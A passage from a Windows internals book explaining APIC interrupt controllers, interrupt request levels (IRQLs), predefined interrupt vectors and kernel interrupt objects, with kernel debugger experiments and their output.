only run on APIC hardware regardless of CPU architecture. Another
difference on x64 systems is that the APIC’s Task Priority Register, or TPR,
is now directly tied to the processor’s Control Register 8 (CR8). Modern
operating systems, including Windows, now use this register to store the
current software interrupt priority level (in the case of Windows, called the
IRQL) and to inform the IOAPIC when it makes routing decisions. More
information on IRQL handling will follow shortly.
EXPERIMENT: Viewing the PIC and APIC
You can view the configuration of the PIC on a uniprocessor and
the current local APIC on a multiprocessor by using the !pic and
!apic kernel debugger commands, respectively. Here’s the output
of the !pic command on a uniprocessor. Note that even on a system
with an APIC, this command still works because APIC systems
always have an associated PIC-equivalent for emulating legacy
hardware.
Click here to view code image
lkd> !pic
----- IRQ Number ----- 00 01 02 03 04 05 06 07 08 09 0A 0B
0C 0D 0E 0F
Physically in service: Y . . . . . . . . Y Y Y
. . . .
Physically masked: Y Y Y Y Y Y Y Y Y Y Y Y
Y Y Y Y
Physically requested: Y . . . . . . . . Y Y Y
. . . .
Level Triggered: . . . . . . . . . . . .
. . . .
Here’s the output of the !apic command on a system running
with Hyper-V enabled, which you can see due to the presence of
the SINTI entries, referring to Hyper-V’s Synthetic Interrupt
Controller (SynIC), described in Chapter 9. Note that during local
kernel debugging, this command shows the APIC associated with
the current processor—in other words, whichever processor the
debugger’s thread happens to be running on as you enter the
command. When looking at a crash dump or remote system, you
can use the ~ (tilde) command followed by the processor number to
switch the processor of whose local APIC you want to see. In
either case, the number next to the ID: label will tell you which
processor you are looking at.
Click here to view code image
lkd> !apic
Apic (x2Apic mode) ID:1 (50014) LogDesc:00000002 TPR 00
TimeCnt: 00000000clk SpurVec:df FaultVec:e2 error:0
Ipi Cmd: 00000000`0004001f Vec:1F FixedDel Dest=Self
edg high
Timer..: 00000000`000300d8 Vec:D8 FixedDel Dest=Self
edg high m
Linti0.: 00000000`000100d8 Vec:D8 FixedDel Dest=Self
edg high m
Linti1.: 00000000`00000400 Vec:00 NMI Dest=Self
edg high
Sinti0.: 00000000`00020030 Vec:30 FixedDel Dest=Self
edg high
Sinti1.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sinti2.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sinti3.: 00000000`000000d1 Vec:D1 FixedDel Dest=Self
edg high
Sinti4.: 00000000`00020030 Vec:30 FixedDel Dest=Self
edg high
Sinti5.: 00000000`00020031 Vec:31 FixedDel Dest=Self
edg high
Sinti6.: 00000000`00020032 Vec:32 FixedDel Dest=Self
edg high
Sinti7.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sinti8.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sinti9.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sintia.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sintib.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sintic.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sintid.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sintie.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
Sintif.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high m
TMR: 95, A5, B0
IRR:
ISR:
The various numbers following the Vec labels indicate the
associated vector in the IDT with the given command. For
example, in this output, interrupt number 0x1F is associated with
the Interrupt Processor Interrupt (IPI) vector, and interrupt number
0xE2 handles APIC errors. Going back to the !idt output from the
earlier experiment, you can notice that 0x1F is the kernel’s APC
Interrupt (meaning that an IPI was recently used to send an APC
from one processor to another), and 0xE2 is the HAL’s Local APIC
Error Handler, as expected.
The following output is for the !ioapic command, which displays
the configuration of the I/O APICs, the interrupt controller
components connected to devices. For example, note how
GSIV/IRQ 9 (the System Control Interrupt, or SCI) is associated
with vector B0h, which in the !idt output from the earlier
experiment was associated with ACPI.SYS.
Click here to view code image
0: kd> !ioapic
Controller at 0xfffff7a8c0000898 I/O APIC at VA
0xfffff7a8c0012000
IoApic @ FEC00000 ID:8 (11) Arb:0
Inti00.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti01.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti02.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti03.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti04.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti05.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti06.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti07.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti08.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti09.: ff000000`000089b0 Vec:B0 LowestDl Lg:ff000000
lvl high
Inti0A.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Inti0B.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high m
Software interrupt request levels (IRQLs)
Although interrupt controllers perform interrupt prioritization, Windows
imposes its own interrupt priority scheme known as interrupt request levels
(IRQLs). The kernel represents IRQLs internally as a number from 0 through
31 on x86 and from 0 to 15 on x64 (and ARM/ARM64), with higher numbers
representing higher-priority interrupts. Although the kernel defines the
standard set of IRQLs for software interrupts, the HAL maps hardware-
interrupt numbers to the IRQLs. Figure 8-13 shows IRQLs defined for the
x86 architecture and for the x64 (and ARM/ARM64) architecture.
Figure 8-13 x86 and x64 interrupt request levels (IRQLs).
Interrupts are serviced in priority order, and a higher-priority interrupt
preempts the servicing of a lower-priority interrupt. When a high-priority
interrupt occurs, the processor saves the interrupted thread’s state and
invokes the trap dispatchers associated with the interrupt. The trap dispatcher
raises the IRQL and calls the interrupt’s service routine. After the service
routine executes, the interrupt dispatcher lowers the processor’s IRQL to
where it was before the interrupt occurred and then loads the saved machine
state. The interrupted thread resumes executing where it left off. When the
kernel lowers the IRQL, lower-priority interrupts that were masked might
materialize. If this happens, the kernel repeats the process to handle the new
interrupts.
IRQL priority levels have a completely different meaning than thread-
scheduling priorities (which are described in Chapter 5 of Part 1). A
scheduling priority is an attribute of a thread, whereas an IRQL is an attribute
of an interrupt source, such as a keyboard or a mouse. In addition, each
processor has an IRQL setting that changes as operating system code
executes. As mentioned earlier, on x64 systems, the IRQL is stored in the
CR8 register that maps back to the TPR on the APIC.
Each processor’s IRQL setting determines which interrupts that processor
can receive. IRQLs are also used to synchronize access to kernel-mode data
structures. (You’ll find out more about synchronization later in this chapter.)
As a kernel-mode thread runs, it raises or lowers the processor’s IRQL
directly by calling KeRaiseIrql and KeLowerIrql or, more commonly,
indirectly via calls to functions that acquire kernel synchronization objects.
As Figure 8-14 illustrates, interrupts from a source with an IRQL above the
current level interrupt the processor, whereas interrupts from sources with
IRQLs equal to or below the current level are masked until an executing
thread lowers the IRQL.
Figure 8-14 Masking interrupts.
A kernel-mode thread raises and lowers the IRQL of the processor on
which it’s running, depending on what it’s trying to do. For example, when
an interrupt occurs, the trap handler (or perhaps the processor, depending on
its architecture) raises the processor’s IRQL to the assigned IRQL of the
interrupt source. This elevation masks all interrupts at and below that IRQL
(on that processor only), which ensures that the processor servicing the
interrupt isn’t waylaid by an interrupt at the same level or a lower level. The
masked interrupts are either handled by another processor or held back until
the IRQL drops. Therefore, all components of the system, including the
kernel and device drivers, attempt to keep the IRQL at passive level
(sometimes called low level). They do this because device drivers can
respond to hardware interrupts in a timelier manner if the IRQL isn’t kept
unnecessarily elevated for long periods. Thus, when the system is not
performing any interrupt work (or needs to synchronize with it) or handling a
software interrupt such as a DPC or APC, the IRQL is always 0. This
obviously includes any user-mode processing because allowing user-mode
code to touch the IRQL would have significant effects on system operation.
In fact, returning to a user-mode thread with the IRQL above 0 results in an
immediate system crash (bugcheck) and is a serious driver bug.
Finally, note that dispatcher operations themselves—such as context
switching from one thread to another due to preemption—run at IRQL 2
(hence the name dispatch level), meaning that the processor behaves in a
single-threaded, cooperative fashion at this level and above. It is, for
example, illegal to wait on a dispatcher object (more on this in the
“Synchronization” section that follows) at this IRQL, as a context switch to a
different thread (or the idle thread) would never occur. Another restriction is
that only nonpaged memory can be accessed at IRQL DPC/dispatch level or
higher.
This rule is actually a side effect of the first restriction because attempting to
access memory that isn’t resident results in a page fault. When a page fault
occurs, the memory manager initiates a disk I/O and then needs to wait for
the file system driver to read the page in from disk. This wait would, in turn,
require the scheduler to perform a context switch (perhaps to the idle thread if
no user thread is waiting to run), thus violating the rule that the scheduler
can’t be invoked (because the IRQL is still DPC/dispatch level or higher at
the time of the disk read). A further problem results in the fact that I/O
completion typically occurs at APC_LEVEL, so even in cases where a wait
wouldn’t be required, the I/O would never complete because the completion
APC would not get a chance to run.
If either of these two restrictions is violated, the system crashes with an
IRQL_NOT_LESS_OR_EQUAL or a
DRIVER_IRQL_NOT_LESS_OR_EQUAL crash code. (See Chapter 10,
“Management, diagnostics, and tracing” for a thorough discussion of system
crashes.) Violating these restrictions is a common bug in device drivers. The
Windows Driver Verifier has an option you can set to assist in finding this
particular type of bug.
Conversely, this also means that when working at IRQL 1 (also called
APC level), preemption is still active and context switching can occur. This
makes IRQL 1 essentially behave as a thread-local IRQL instead of a
processor-local IRQL, since a wait operation or preemption operation at
IRQL 1 will cause the scheduler to save the current IRQL in the thread’s
control block (in the KTHREAD structure, as seen in Chapter 5), and restore
the processor’s IRQL to that of the newly executed thread. This means that a
thread at passive level (IRQL 0) can still preempt a thread running at APC
level (IRQL 1), because below IRQL 2, the scheduler decides which thread
controls the processor.
EXPERIMENT: Viewing the IRQL
You can view a processor’s saved IRQL with the !irql debugger
command. The saved IRQL represents the IRQL at the time just
before the break-in to the debugger, which raises the IRQL to a
static, meaningless value:
Click here to view code image
kd> !irql
Debugger saved IRQL for processor 0x0 -- 0 (LOW_LEVEL)
Note that the IRQL value is saved in two locations. The first,
which represents the current IRQL, is the processor control region
(PCR), whereas its extension, the processor region control block
(PRCB), contains the saved IRQL in the DebuggerSavedIRQL
field. This trick is used because using a remote kernel debugger
will raise the IRQL to HIGH_LEVEL to stop any and all
asynchronous processor operations while the user is debugging the
machine, which would cause the output of !irql to be meaningless.
This “saved” value is thus used to indicate the IRQL right before
the debugger is attached.
Each interrupt level has a specific purpose. For example, the
kernel issues an interprocessor interrupt (IPI) to request that
another processor perform an action, such as dispatching a
particular thread for execution or updating its translation look-aside
buffer (TLB) cache. The system clock generates an interrupt at
regular intervals, and the kernel responds by updating the clock and
measuring thread execution time. The HAL provides interrupt
levels for use by interrupt-driven devices; the exact number varies
with the processor and system configuration. The kernel uses
software interrupts (described later in this chapter) to initiate thread
scheduling and to asynchronously break into a thread’s execution.
Mapping interrupt vectors to IRQLs
On systems without an APIC-based architecture, the mapping between the
GSIV/IRQ and the IRQL had to be strict. To avoid situations where the
interrupt controller might think an interrupt line is of higher priority than
another, when in Windows’s world, the IRQLs reflected an opposite
situation. Thankfully, with APICs, Windows can easily expose the IRQL as
part of the APIC’s TPR, which in turn can be used by the APIC to make
better delivery decisions. Further, on APIC systems, the priority of each
hardware interrupt is not tied to its GSIV/IRQ, but rather to the interrupt
vector: the upper 4 bits of the vector map back to the priority. Since the IDT
can have up to 256 entries, this gives a space of 16 possible priorities (for
example, vector 0x40 would be priority 4), which are the same 16 numbers
that the TPR can hold, which map back to the same 16 IRQLs that Windows
implements!
Therefore, for Windows to determine what IRQL to assign to an interrupt, it
must first determine the appropriate interrupt vector for the interrupt, and
program the IOAPIC to use that vector for the associated hardware GSIV. Or,
conversely, if a specific IRQL is needed for a hardware device, Windows
must choose an interrupt vector that maps back to that priority. These
decisions are performed by the Plug and Play manager working in concert
with a type of device driver called a bus driver, which determines the
presence of devices on its bus (PCI, USB, and so on) and what interrupts can
be assigned to a device. The bus driver reports this information to the Plug
and Play manager, which decides—after taking into account the acceptable
interrupt assignments for all other devices—which interrupt will be assigned
to each device. Then it calls a Plug and Play interrupt arbiter, which maps
interrupts to IRQLs. This arbiter is exposed by the HAL, which also works
with the ACPI bus driver and the PCI bus driver to collectively determine the
appropriate mapping. In most cases, the ultimate vector number is selected in
a round-robin fashion, so there is no computable way to figure it out ahead of
time. However, an experiment later in this section shows how the debugger
can query this information from the interrupt arbiter.
Outside of arbitered interrupt vectors associated with hardware interrupts,
Windows also has a number of predefined interrupt vectors that are always at
the same index in the IDT, which are defined in Table 8-4.
Table 8-4 Predefined interrupt vectors
Vector
Usage
0x1F
APC interrupt
0x2F
DPC interrupt
0x30
Hypervisor interrupt
0x31-0x34
VMBus interrupt(s)
0x35
CMCI interrupt
0xCD
Thermal interrupt
0xCE
IOMMU interrupt
0xCF
DMA interrupt
0xD1
Clock timer interrupt
0xD2
Clock IPI interrupt
0xD3
Clock always on interrupt
0xD7
Reboot Interrupt
0xD8
Stub interrupt
0xD9
Test interrupt
0xDF
Spurious interrupt
0xE1
IPI interrupt
0xE2
LAPIC error interrupt
0xE3
DRS interrupt
0xF0
Watchdog interrupt
0xFB
Hypervisor HPET interrupt
0xFD
Profile interrupt
0xFE
Performance interrupt
You’ll note that the vector number’s priority (recall that this is stored in the
upper 4 bits, or nibble) typically matches the IRQLs shown in the Figure 8-14
—for example, the APC interrupt is 1, the DPC interrupt is 2, while the IPI
interrupt is 14, and the profile interrupt is 15. On this topic, let’s see what the
predefined IRQLs are on a modern Windows system.
Predefined IRQLs
Let’s take a closer look at the use of the predefined IRQLs, starting from the
highest level shown in Figure 8-13:
■ The kernel typically uses high level only when it’s halting the system
in KeBugCheckEx and masking out all interrupts or when a remote
kernel debugger is attached. The profile level shares the same value
on non-x86 systems, which is where the profile timer runs when this
functionality is enabled. The performance interrupt, associated with
such features as Intel Processor Trace (Intel PT) and other hardware
performance monitoring unit (PMU) capabilities, also runs at this
level.
■ Interprocessor interrupt level is used to request another processor to
perform an action, such as updating the processor’s TLB cache or
modifying a control register on all processors. The Deferred Recovery
Service (DRS) level also shares the same value and is used on x64
systems by the Windows Hardware Error Architecture (WHEA) for
performing recovery from certain Machine Check Errors (MCE).
■ Clock level is used for the system’s clock, which the kernel uses to
track the time of day as well as to measure and allot CPU time to
threads.
■ The synchronization IRQL is internally used by the dispatcher and
scheduler code to protect access to global thread scheduling and
wait/synchronization code. It is typically defined as the highest level
right after the device IRQLs.
■ The device IRQLs are used to prioritize device interrupts. (See the
previous section for how hardware interrupt levels are mapped to
IRQLs.)
■ The corrected machine check interrupt level is used to signal the
operating system after a serious but corrected hardware condition or
error that was reported by the CPU or firmware through the Machine
Check Error (MCE) interface.
■ DPC/dispatch-level and APC-level interrupts are software interrupts
that the kernel and device drivers generate. (DPCs and APCs are
explained in more detail later in this chapter.)
■ The lowest IRQL, passive level, isn’t really an interrupt level at all;
it’s the setting at which normal thread execution takes place and all
interrupts can occur.
Interrupt objects
The kernel provides a portable mechanism—a kernel control object called an
interrupt object, or KINTERRUPT—that allows device drivers to register
ISRs for their devices. An interrupt object contains all the information the
kernel needs to associate a device ISR with a particular hardware interrupt,
including the address of the ISR, the polarity and trigger mode of the
interrupt, the IRQL at which the device interrupts, sharing state, the GSIV
and other interrupt controller data, as well as a host of performance statistics.
These interrupt objects are allocated from a common pool of memory, and
when a device driver registers an interrupt (with IoConnectInterrupt or
IoConnectInterruptEx), one is initialized with all the necessary information.
Based on the number of processors eligible to receive the interrupt (which is
indicated by the device driver when specifying the interrupt affinity), a
KINTERRUPT object is allocated for each one—in the typical case, this
means for every processor on the machine. Next, once an interrupt vector has
been selected, an array in the KPRCB (called InterruptObject) of each
eligible processor is updated to point to the allocated KINTERRUPT object
that’s specific to it.
As the KINTERRUPT is allocated, a check is made to validate whether the
chosen interrupt vector is a shareable vector, and if so, whether an existing
KINTERRUPT has already claimed the vector. If yes, the kernel updates the
DispatchAddress field (of the KINTERRUPT data structure) to point to the
function KiChainedDispatch and adds this KINTERRUPT to a linked list
(InterruptListEntry) contained in the first existing KINTERRUPT already
associated with the vector. If this is an exclusive vector, on the other hand,
then KiInterruptDispatch is used instead.
The interrupt object also stores the IRQL associated with the interrupt so
that KiInterruptDispatch or KiChainedDispatch can raise the IRQL to the
correct level before calling the ISR and then lower the IRQL after the ISR
has returned. This two-step process is required because there’s no way to
pass a pointer to the interrupt object (or any other argument for that matter)
on the initial dispatch because the initial dispatch is done by hardware.
When an interrupt occurs, the IDT points to one of 256 copies of the
KiIsrThunk function, each one having a different line of assembly code that
pushes the interrupt vector on the kernel stack (because this is not provided
by the processor) and then calling a shared KiIsrLinkage function, which
does the rest of the processing. Among other things, the function builds an
appropriate trap frame as explained previously, and eventually calls the
dispatch address stored in the KINTERRUPT (one of the two functions
above). It finds the KINTERRUPT by reading the current KPRCB’s
InterruptObject array and using the interrupt vector on the stack as an index,
dereferencing the matching pointer. On the other hand, if a KINTERRUPT is
not present, then this interrupt is treated as an unexpected interrupt. Based on
the value of the registry value BugCheckUnexpectedInterrupts in the
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel key,
the system might either crash with KeBugCheckEx, or the interrupt is silently
ignored, and execution is restored back to the original control point.
On x64 Windows systems, the kernel optimizes interrupt dispatch by using
specific routines that save processor cycles by omitting functionality that
isn’t needed, such as KiInterruptDispatchNoLock, which is used for
interrupts that do not have an associated kernel-managed spinlock (typically
used by drivers that want to synchronize with their ISRs),
KiInterruptDispatchNoLockNoEtw for interrupts that do not want ETW
performance tracing, and KiSpuriousDispatchNoEOI for interrupts that are
not required to send an end-of-interrupt signal since they are spurious.
Finally, KiInterruptDispatchNoEOI, which is used for interrupts that have
programmed the APIC in Auto-End-of-Interrupt (Auto-EOI) mode—because
the interrupt controller will send the EOI signal automatically, the kernel
does not need the extra code to perform the EOI itself. For example, many
HAL interrupt routines take advantage of the “no-lock” dispatch code
because the HAL does not require the kernel to synchronize with its ISR.
Another kernel interrupt handler is KiFloatingDispatch, which is used for
interrupts that require saving the floating-point state. Unlike kernel-mode
code, which typically is not allowed to use floating-point (MMX, SSE,
3DNow!) operations because these registers won’t be saved across context
switches, ISRs might need to use these registers (such as the video card ISR
performing a quick drawing operation). When connecting an interrupt,
drivers can set the FloatingSave argument to TRUE, requesting that the
kernel use the floating-point dispatch routine, which will save the floating
registers. (However, this greatly increases interrupt latency.) Note that this is
supported only on 32-bit systems.
Regardless of which dispatch routine is used, ultimately a call to the
ServiceRoutine field in the KINTERRUPT will be made, which is where the
driver’s ISR is stored. Alternatively, for message signaled interrupts (MSI),
which are explained later, this is a pointer to KiInterruptMessageDispatch,
which will then call the MessageServiceRoutine pointer in KINTERRUPT
instead. Note that in some cases, such as when dealing with Kernel Mode
Driver Framework (KMDF) drivers, or certain miniport drivers such as those
based on NDIS or StorPort (more on driver frameworks is explained in
Chapter 6 of Part 1, “I/O system”), these routines might be specific to the
framework and/or port driver, which will do further processing before calling
the final underlying driver.
Figure 8-15 shows typical interrupt control flow for interrupts associated
with interrupt objects.
Figure 8-15 Typical interrupt control flow.
Associating an ISR with a particular level of interrupt is called connecting
an interrupt object, and dissociating an ISR from an IDT entry is called
disconnecting an interrupt object. These operations, accomplished by calling
the kernel functions IoConnectInterruptEx and IoDisconnectInterruptEx,
allow a device driver to “turn on” an ISR when the driver is loaded into the
system and to “turn off” the ISR if the driver is unloaded.
As was shown earlier, using the interrupt object to register an ISR prevents
device drivers from fiddling directly with interrupt hardware (which differs
among processor architectures) and from needing to know any details about
the IDT. This kernel feature aids in creating portable device drivers because
it eliminates the need to code in assembly language or to reflect processor
differences in device drivers. Interrupt objects provide other benefits as well.
By using the interrupt object, the kernel can synchronize the execution of the
ISR with other parts of a device driver that might share data with the ISR.
(See Chapter 6 in Part 1 for more information about how device drivers
respond to interrupts.)
We also described the concept of a chained dispatch, which allows the
kernel to easily call more than one ISR for any interrupt level. If multiple
device drivers create interrupt objects and connect them to the same IDT
entry, the KiChainedDispatch routine calls each ISR when an interrupt
occurs at the specified interrupt line. This capability allows the kernel to
easily support daisy-chain configurations, in which several devices share the
same interrupt line. The chain breaks when one of the ISRs claims ownership
for the interrupt by returning a status to the interrupt dispatcher.
If multiple devices sharing the same interrupt require service at the same
time, devices not acknowledged by their ISRs will interrupt the system again
once the interrupt dispatcher has lowered the IRQL. Chaining is permitted
only if all the device drivers wanting to use the same interrupt indicate to the
kernel that they can share the interrupt (indicated by the ShareVector field in
the KINTERRUPT object); if they can’t, the Plug and Play manager
reorganizes their interrupt assignments to ensure that it honors the sharing
requirements of each.
EXPERIMENT: Examining interrupt internals
Using the kernel debugger, you can view details of an interrupt
object, including its IRQL, ISR address, and custom interrupt-
dispatching code. First, execute the !idt debugger command and
check whether you can locate an entry that includes a reference to
I8042KeyboardInterruptService, the ISR routine for the PS2
keyboard device. Alternatively, you can look for entries pointing to
Stornvme.sys or Scsiport.sys or any other third-party driver you
recognize. In a Hyper-V virtual machine, you may simply want to
use the Acpi.sys entry. Here’s a system with a PS2 keyboard device
entry:
Click here to view code image
70: fffff8045675a600
i8042prt!I8042KeyboardInterruptService (KINTERRUPT
ffff8e01cbe3b280)
To view the contents of the interrupt object associated with the
interrupt, you can simply click on the link that the debugger offers,
which uses the dt command, or you can manually use the dx
command as well. Here’s the KINTERRUPT from the machine
used in the experiment:
Click here to view code image
6: kd> dt nt!_KINTERRUPT ffff8e01cbe3b280
+0x000 Type : 0n22
+0x002 Size : 0n256
+0x008 InterruptListEntry : _LIST_ENTRY [
0x00000000`00000000 - 0x00000000`00000000 ]
+0x018 ServiceRoutine : 0xfffff804`65e56820
unsigned char
i8042prt!I8042KeyboardInterruptService
+0x020 MessageServiceRoutine : (null)
+0x028 MessageIndex : 0
+0x030 ServiceContext : 0xffffe50f`9dfe9040 Void
+0x038 SpinLock : 0
+0x040 TickCount : 0
+0x048 ActualLock : 0xffffe50f`9dfe91a0 -> 0
+0x050 DispatchAddress : 0xfffff804`565ca320 void
nt!KiInterruptDispatch+0
+0x058 Vector : 0x70
+0x05c Irql : 0x7 ''
+0x05d SynchronizeIrql : 0x7 ''
+0x05e FloatingSave : 0 ''
+0x05f Connected : 0x1 ''
+0x060 Number : 6
+0x064 ShareVector : 0 ''
+0x065 EmulateActiveBoth : 0 ''
+0x066 ActiveCount : 0
+0x068 InternalState : 0n4
+0x06c Mode : 1 ( Latched )
+0x070 Polarity : 0 ( InterruptPolarityUnknown )
+0x074 ServiceCount : 0
+0x078 DispatchCount : 0
+0x080 PassiveEvent : (null)
+0x088 TrapFrame : (null)
+0x090 DisconnectData : (null)
+0x098 ServiceThread : (null)
+0x0a0 ConnectionData : 0xffffe50f`9db3bd90
_INTERRUPT_CONNECTION_DATA
+0x0a8 IntTrackEntry : 0xffffe50f`9d091d90 Void
+0x0b0 IsrDpcStats : _ISRDPCSTATS
+0x0f0 RedirectObject : (null)
+0x0f8 Padding : [8] ""
In this example, the IRQL that Windows assigned to the
interrupt is 7, which matches the fact that the interrupt vector is
0x70 (and hence the upper 4 bits are 7). Furthermore, you can see
from the DispatchAddress field that this is a regular
KiInterruptDispatch-style interrupt with no additional
optimizations or sharing.
If you wanted to see which GSIV (IRQ) was associated with the
interrupt, there are two ways in which you can obtain this data.
First, recent versions of Windows now store this data as an
INTERRUPT_CONNECTION_DATA structure embedded in the
ConnectionData field of the KINTERRUPT, as shown in the
preceding output. You can use the dt command to dump the pointer
from your system as follows:
Click here to view code image
6: kd> dt 0xffffe50f`9db3bd90 _INTERRUPT_CONNECTION_DATA
Vectors[0]..
nt!_INTERRUPT_CONNECTION_DATA
+0x008 Vectors : [0]
+0x000 Type : 0 ( InterruptTypeControllerInput
)
+0x004 Vector : 0x70
+0x008 Irql : 0x7 ''
+0x00c Polarity : 1 ( InterruptActiveHigh )
+0x010 Mode : 1 ( Latched )
+0x018 TargetProcessors :
+0x000 Mask : 0xff
+0x008 Group : 0
+0x00a Reserved : [3] 0
+0x028 IntRemapInfo :
+0x000 IrtIndex :
0y000000000000000000000000000000 (0)
+0x000 FlagHalInternal : 0y0
+0x000 FlagTranslated : 0y0
+0x004 u : <anonymous-tag>
+0x038 ControllerInput :
+0x000 Gsiv : 1
The Type indicates that this is a traditional line/controller-based
input, and the Vector and Irql fields confirm earlier data seen in the
KINTERRUPT already. Next, by looking at the ControllerInput
structure, you can see that the GSIV is 1 (i.e., IRQ 1). If you’d
been looking at a different kind of interrupt, such as a Message
Signaled Interrupt (more on this later), you would dereference the
MessageRequest field instead, for example.
Another way to map GSIV to interrupt vectors is to recall that
Windows keeps track of this translation when managing device
resources through what are called arbiters. For each resource type,
an arbiter maintains the relationship between virtual resource usage
(such as an interrupt vector) and physical resources (such as an
interrupt line). As such, you can query the ACPI IRQ arbiter and
obtain this mapping. Use the !apciirqarb command to obtain
information on the ACPI IRQ arbiter:
Click here to view code image
6: kd> !acpiirqarb
Processor 0 (0, 0):
Device Object: 0000000000000000
Current IDT Allocation:
...
000000070 - 00000070 D ffffe50f9959baf0 (i8042prt)
A:ffffce0717950280 IRQ(GSIV):1
...
Note that the GSIV for the keyboard is IRQ 1, which is a legacy
number from back in the IBM PC/AT days that has persisted to this
day. You can also use !arbiter 4 (4 tells the debugger to display
only IRQ arbiters) to see the specific entry underneath the ACPI
IRQ arbiter:
Click here to view code image
6: kd> !arbiter 4
DEVNODE ffffe50f97445c70 (ACPI_HAL\PNP0C08\0)
Interrupt Arbiter "ACPI_IRQ" at fffff804575415a0
Allocated ranges:
0000000000000001 - 0000000000000001
ffffe50f9959baf0 (i8042prt)
In this case, note that the range represents the GSIV (IRQ), not
the interrupt vector. Further, note that in either output, you are
given the owner of the vector, in the type of a device object (in this
case, 0xFFFFE50F9959BAF0). You can then use the !devobj
command to get information on the i8042prt device in this example
(which corresponds to the PS/2 driver):
Click here to view code image
6: kd> !devobj 0xFFFFE50F9959BAF0
Device object (ffffe50f9959baf0) is for:
00000049 \Driver\ACPI DriverObject ffffe50f974356f0
Current Irp 00000000 RefCount 1 Type 00000032 Flags 00001040
SecurityDescriptor ffffce0711ebf3e0 DevExt ffffe50f995573f0
DevObjExt ffffe50f9959bc40
DevNode ffffe50f9959e670
ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT
Characteristics (0x00000080) FILE_AUTOGENERATED_DEVICE_NAME
AttachedDevice (Upper) ffffe50f9dfe9040 \Driver\i8042prt
Device queue is not busy.
The device object is associated to a device node, which stores all
the device’s physical resources. You can now dump these resources
with the !devnode command, and using the 0xF flag to ask for both
raw and translated resource information:
Click here to view code image
6: kd> !devnode ffffe50f9959e670 f
DevNode 0xffffe50f9959e670 for PDO 0xffffe50f9959baf0
InstancePath is "ACPI\LEN0071\4&36899b7b&0"
ServiceName is "i8042prt"
TargetDeviceNotify List - f 0xffffce0717307b20 b
0xffffce0717307b20
State = DeviceNodeStarted (0x308)
Previous State = DeviceNodeEnumerateCompletion (0x30d)
CmResourceList at 0xffffce0713518330 Version 1.1
Interface 0xf Bus #0
Entry 0 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x60 for 0x1 bytes
Entry 1 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x64 for 0x1 bytes
Entry 2 - Interrupt (0x2) Device Exclusive (0x1)
Flags (LATCHED
Level 0x1, Vector 0x1, Group 0, Affinity 0xffffffff
...
TranslatedResourceList at 0xffffce0713517bb0 Version 1.1
Interface 0xf Bus #0
Entry 0 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x60 for 0x1 bytes
Entry 1 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x64 for 0x1 bytes
Entry 2 - Interrupt (0x2) Device Exclusive (0x1)
Flags (LATCHED
Level 0x7, Vector 0x70, Group 0, Affinity 0xff
The device node tells you that this device has a resource list with
three entries, one of which is an interrupt entry corresponding to
IRQ 1. (The level and vector numbers represent the GSIV rather
than the interrupt vector.) Further down, the translated resource list
now indicates the IRQL as 7 (this is the level number) and the
interrupt vector as 0x70.
On ACPI systems, you can also obtain this information in a
slightly easier way by reading the extended output of the
!acpiirqarb command introduced earlier. As part of its output, it
displays the IRQ to IDT mapping table:
Click here to view code image
Interrupt Controller (Inputs: 0x0-0x77):
(01)Cur:IDT-70 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0
Boot-0 lev unk
(02)Cur:IDT-80 Ref-1 Boot-1 edg hi Pos:IDT-00 Ref-0
Boot-1 lev unk
(08)Cur:IDT-90 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0
Boot-0 lev unk
(09)Cur:IDT-b0 Ref-1 Boot-0 lev hi Pos:IDT-00 Ref-0
Boot-0 lev unk
(0e)Cur:IDT-a0 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0
Boot-0 lev unk
(10)Cur:IDT-b5 Ref-2 Boot-0 lev low Pos:IDT-00 Ref-0
Boot-0 lev unk
(11)Cur:IDT-a5 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0
Boot-0 lev unk
(12)Cur:IDT-95 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0
Boot-0 lev unk
(14)Cur:IDT-64 Ref-2 Boot-0 lev low Pos:IDT-00 Ref-0
Boot-0 lev unk
(17)Cur:IDT-54 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0
Boot-0 lev unk
(1f)Cur:IDT-a6 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0
Boot-0 lev unk
(41)Cur:IDT-96 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0
Boot-0 lev unk
As expected, IRQ 1 is associated with IDT entry 0x70. For more
information on device objects, resources, and other related
concepts, see Chapter 6 in Part 1.
Line-based versus message signaled–based
interrupts
